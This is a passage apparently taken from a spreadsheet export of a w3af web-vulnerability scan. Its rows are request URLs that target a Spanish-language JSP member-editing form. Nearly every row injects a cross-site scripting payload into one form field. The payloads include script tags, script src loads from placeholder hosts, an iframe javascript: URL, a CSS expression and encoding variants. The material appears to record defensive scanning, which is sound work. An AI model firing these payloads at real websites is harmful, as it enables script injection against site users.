    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;_x0000_script&gt;fake_alert("zdwf")&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script+src=http://zdwf/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script/xss+src=http://zdwf/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script/src=http://zdwf/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert("zdwf")&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion='';!--"&lt;zdwf&gt;=&amp;{()}&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script&gt;a=/zdwf/fake_alert(a.source)&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=mq9lx&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(bnzd))&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script+src=http://bnzd/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/xss+src=http://bnzd/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/src=http://bnzd/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos='';!--"&lt;bnzd&gt;=&amp;{()}&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert("bnzd")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;a=/bnzd/fake_alert(a.source)&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;_x0000_script&gt;fake_alert("bnzd")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=vpnsk&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script/xss+src=http://6bos/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script+src=http://6bos/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert("6bos")&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad='';!--"&lt;6bos&gt;=&amp;{()}&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script/src=http://6bos/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert(string.fromcharcode(6bos))&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;a=/6bos/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=kqnhr</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;_x0000_script&gt;fake_alert("dwmk")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(dwmk))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;a=/dwmk/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert("dwmk")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo='';!--"&lt;dwmk&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script+src=http://dwmk/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/xss+src=http://dwmk/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/src=http://dwmk/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=nqc8k&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert("hjmr")&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert(string.fromcharcode(hjmr))&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script+src=http://hjmr/x.js&gt;&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script/xss+src=http://hjmr/x.js&gt;&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=knal9&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=dswq2&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script/xss+src=http://iqjw/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script/src=http://iqjw/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert(string.fromcharcode(iqjw))&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert("iqjw")&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;a=/iqjw/fake_alert(a.source)&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;_x0000_script&gt;fake_alert("iqjw")&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password='';!--"&lt;iqjw&gt;=&amp;{()}&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script+src=http://iqjw/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1grjd&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert(string.fromcharcode(iaba))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email='';!--"&lt;iaba&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script+src=http://iaba/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;a=/iaba/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=1vkvo&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;fake_alert(string.fromcharcode(ojmz))&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login='';!--"&lt;ojmz&gt;=&amp;{()}&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;a=/ojmz/fake_alert(a.source)&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script/xss+src=http://ojmz/x.js&gt;&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;_x0000_script&gt;fake_alert("ojmz")&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script/src=http://ojmz/x.js&gt;&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=t8yac&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=d9jie&lt;nnc1&gt;nnc1"nnc1'nnc1(nnc1)d9jie&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp='';!--"&lt;zmmf&gt;=&amp;{()}&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;iframe+src="javascript:alert('zmmf');"&gt;&lt;/iframe&gt;&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;_x0000_script&gt;alert("zmmf")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&lt;script/xss+src=http://zmmf/x.js&gt;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&lt;script/src=http://zmmf/x.js&gt;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&lt;script&gt;a=/zmmf/alert(a.source)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&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;alert("zmmf")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'';!--"&lt;geut&gt;=&amp;{()}&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;a=/geut/fake_alert(a.source)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&lt;script&gt;fake_alert("geut")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&lt;_x0000_script&gt;fake_alert("geut")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&lt;script+src=http://geut/x.js&gt;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&lt;script&gt;fake_alert(string.fromcharcode(geut))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cp=&lt;script/src=http://geut/x.js&gt;&lt;/script&gt;&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=ehphq&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=21wht&lt;ooaq&gt;ooaq"ooaq'ooaq(ooaq)21wht&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=&lt;script&gt;a=/omtx/alert(a.source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'';!--"&lt;omtx&gt;=&amp;{()}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/src=http://omtx/x.js&gt;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_x0000_script&gt;alert("omtx"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/xss+src=http://omtx/x.js&gt;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&gt;alert("omtx"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&gt;alert(string.fromcharcode(omtx)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_x0000_ipt&gt;alert("omtx")&lt;/sc_x0000_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/src=http://ktpb/x.js&gt;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/xss+src=http://ktpb/x.js&gt;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_x0000_script&gt;fake_alert("ktpb")&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=&lt;script&gt;a=/ktpb/fake_alert(a.source)&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1m9ke&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script&gt;fake_alert(string.fromcharcode(kyrf))&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script&gt;a=/kyrf/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script+src=http://kyrf/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script/src=http://kyrf/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;script/xss+src=http://kyrf/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=&lt;_x0000_script&gt;fake_alert("kyrf")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni='';!--"&lt;kyrf&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
